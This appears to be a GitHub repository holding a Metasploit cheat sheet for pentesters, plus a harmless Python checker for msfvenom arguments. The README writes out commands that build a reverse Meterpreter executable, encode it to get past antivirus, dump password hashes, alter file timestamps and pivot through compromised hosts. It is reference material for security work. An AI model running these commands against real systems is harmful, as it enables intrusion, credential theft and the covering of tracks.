├── image
│   ├── rapid7.png
│   └── metasploit.png
├── .gitignore
├── .github
│   └── FUNDING.yml
├── LICENSE
└── README.md
/image/rapid7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/security-cheatsheet/metasploit-cheat-sheet/HEAD/image/rapid7.png
--------------------------------------------------------------------------------
/image/metasploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/security-cheatsheet/metasploit-cheat-sheet/HEAD/image/metasploit.png
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Node rules:
## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
.grunt

## Dependency directory
## Commenting this out is preferred by some people, see
## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git
node_modules

# Book build output
_book

# eBook build output
*.epub
*.mobi
*.pdf

--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
# These are supported funding model platforms

github: ismailtasdelen
patreon: ismailtasdelen
open_collective: # Replace with a single Open Collective username
ko_fi: # Replace with a single Ko-fi username
tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
liberapay: ismailtasdelen
issuehunt: # Replace with a single IssueHunt username
otechie: # Replace with a single Otechie username
custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2018 İsmail Taşdelen

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
#### Metasploit Cheat Sheet

![Rapid7](image/rapid7.png)

![Metasploit](image/metasploit.png)

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.

Metasploit is a popular tool used by pentest experts. I have prepared a document for you to learn.

#### Metasploit :

###### Search for module:

```
msf > search [regex]
```

###### Specify an exploit to use:

```
msf > use exploit/[ExploitPath]
```

###### Specify a Payload to use:

```
msf > set PAYLOAD [PayloadPath]
```

###### Show options for the current module:

```
msf > show options
```

###### Set options:

```
msf > set [Option] [Value]
```

###### Start exploit:

```
msf > exploit
```

##### Useful Auxiliary Modules

###### Port Scanner:

```
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
```

###### DNS Enumeration:

```
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
```

###### FTP Server:

```
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
```

###### Proxy Server:

```
msf > use auxiliary/server/socks4
msf > run
```

#### msfvenom :

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run it with '-l payloads' to get a list of payloads.

```
$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
```

Example :

Reverse Meterpreter payload as an executable, redirected into a file:

```
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
```

Format Options (specified with -f); run msfvenom with --help-formats to list all available output formats:

- exe - Executable
- pl - Perl
- rb - Ruby
- raw - Raw shellcode
- c - C code

###### Encoding Payloads with msfvenom:

The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run it with '-l encoders' to get a list of encoders.

```
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
```

Example :

Encode a payload 5 times with the shikata_ga_nai encoder and output it as an executable:

```
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
```
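
As an added example (not part of this cheat sheet and not Metasploit's own code), the following Python parser reads the msfvenom argument form shown in the two sections above: the short flags (-p, -f, -e, -i, -l) followed by a value, the KEY=VALUE datastore settings (LHOST, LPORT), and an optional `> file` redirection. It then applies the rule the sheet states in brackets, that a reverse-connection payload needs LHOST and LPORT, and rejects an out-of-range port or an iteration count given without an encoder. The `VenomArgs` structure, the function names and the sample command lines (taken from the examples above) are my own; the flag set is deliberately limited to what the sheet documents.

```python
"""Parser and sanity checker for msfvenom-style argument lists.

Added example, not Metasploit code. The flag table covers only the options
this cheat sheet documents; anything else is reported as unrecognised.
"""
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Flags that take a following value, mapped to a readable name (assumed subset).
FLAGS_WITH_VALUE = {
    "-p": "payload",
    "-f": "format",
    "-e": "encoder",
    "-i": "iterations",
    "-l": "list",
}
# Flags that stand alone.
BARE_FLAGS = {"--help-formats"}


@dataclass
class VenomArgs:
    options: Dict[str, str] = field(default_factory=dict)    # -p/-f/-e/-i/-l values
    datastore: Dict[str, str] = field(default_factory=dict)  # KEY=VALUE settings
    bare: Set[str] = field(default_factory=set)              # stand-alone flags seen
    output: Optional[str] = None                             # target of "> file"


def parse_msfvenom(cmdline: str) -> VenomArgs:
    """Split a command line the way the sheet writes it and sort its arguments."""
    tokens = shlex.split(cmdline)
    # Drop a leading "$" prompt and the program name if they were pasted along.
    while tokens and tokens[0] in ("$", "msfvenom"):
        tokens.pop(0)
    args = VenomArgs()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == ">":
            if i + 1 >= len(tokens):
                raise ValueError("redirection '>' without a file name")
            args.output = tokens[i + 1]
            i += 2
        elif tok in FLAGS_WITH_VALUE:
            if i + 1 >= len(tokens) or tokens[i + 1].startswith("-"):
                raise ValueError(f"{tok} needs a value")
            args.options[FLAGS_WITH_VALUE[tok]] = tokens[i + 1]
            i += 2
        elif tok in BARE_FLAGS:
            args.bare.add(tok)
            i += 1
        elif "=" in tok and not tok.startswith("-"):
            key, _, value = tok.partition("=")
            args.datastore[key.upper()] = value   # datastore keys are case-insensitive
            i += 1
        else:
            raise ValueError(f"unrecognised argument: {tok!r}")
    return args


def check_args(args: VenomArgs) -> List[str]:
    """Return a list of problems; an empty list means the invocation is consistent."""
    problems: List[str] = []
    payload = args.options.get("payload")
    if payload is None and not args.bare and "list" not in args.options:
        problems.append("no payload given (-p) and nothing to list")
    # The sheet marks LHOST/LPORT as needed "if reverse conn.".
    if payload and "reverse" in payload:
        for key in ("LHOST", "LPORT"):
            if key not in args.datastore:
                problems.append(f"{key} is required for reverse payload {payload}")
    port = args.datastore.get("LPORT")
    if port is not None and not (port.isdigit() and 1 <= int(port) <= 65535):
        problems.append(f"LPORT {port!r} is not a valid TCP port")
    if "iterations" in args.options:
        n = args.options["iterations"]
        if not n.isdigit() or int(n) < 1:
            problems.append(f"-i {n!r} must be a positive integer")
        if "encoder" not in args.options:
            problems.append("-i given without -e: iterations only apply to an encoder")
    return problems


if __name__ == "__main__":
    # Constructed sample: the sheet's own "met.exe" example.
    sample = "$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe"
    parsed = parse_msfvenom(sample)
    print(parsed)
    print("problems:", check_args(parsed) or "none")
```

The checker reports every problem it finds rather than stopping at the first, so a single run over a pasted command line lists all the settings that still need fixing.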

##### Metasploit Meterpreter

###### Base Commands:

? / help: Display a summary of commands

exit / quit: Exit the Meterpreter session

sysinfo: Show the system name and OS type

shutdown / reboot: Self-explanatory

###### File System Commands:

cd: Change directory

lcd: Change directory on the local (attacker's) machine

pwd / getwd: Display current working directory

ls: Show the contents of the directory

cat: Display the contents of a file on screen

download / upload: Move files to/from the target machine

mkdir / rmdir: Make / remove directory

edit: Open a file in the default editor (typically vi)

###### Process Commands:

getpid: Display the process ID that Meterpreter is running inside.

getuid: Display the user ID that Meterpreter is running with.

ps: Display process list.

kill: Terminate a process given its process ID.

execute: Run a given program with the privileges of the process the Meterpreter is loaded in.

migrate: Jump to a given destination process ID

- Target process must have same or lesser privileges

- Target process may be a more stable process

- When inside a process, can access any files that process has a lock on.

###### Network Commands:

ipconfig: Show network interface information

portfwd: Forward packets through the TCP session

route: Manage/view the system's routing table

###### Misc Commands:

idletime: Display the duration that the GUI of the target machine has been idle.

uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.

screenshot: Save a screenshot of the target machine as an image.

###### Additional Modules:

use [module]: Load the specified module

Example:

use priv: Load the priv module

hashdump: Dump the hashes from the box

timestomp: Alter NTFS file timestamps

##### Managing Sessions

###### Multiple Exploitation:

Run the exploit expecting a single session that is immediately backgrounded:

```
msf > exploit -z
```

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

```
msf > exploit -j
```

###### List all current jobs (usually exploit listeners):

```
msf > jobs -l
```

###### Kill a job:

```
msf > jobs -k [JobID]
```

##### Multiple Sessions:

###### List all backgrounded sessions:

```
msf > sessions -l
```

###### Interact with a backgrounded session:

```
msf > sessions -i [SessionID]
```

###### Background the current interactive session:

```
meterpreter > <Ctrl+Z>
or
meterpreter > background
```

###### Routing Through Sessions:

All modules (exploits/post/aux) run against the target subnet will be pivoted through this session.

```
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]
```

--------------------------------------------------------------------------------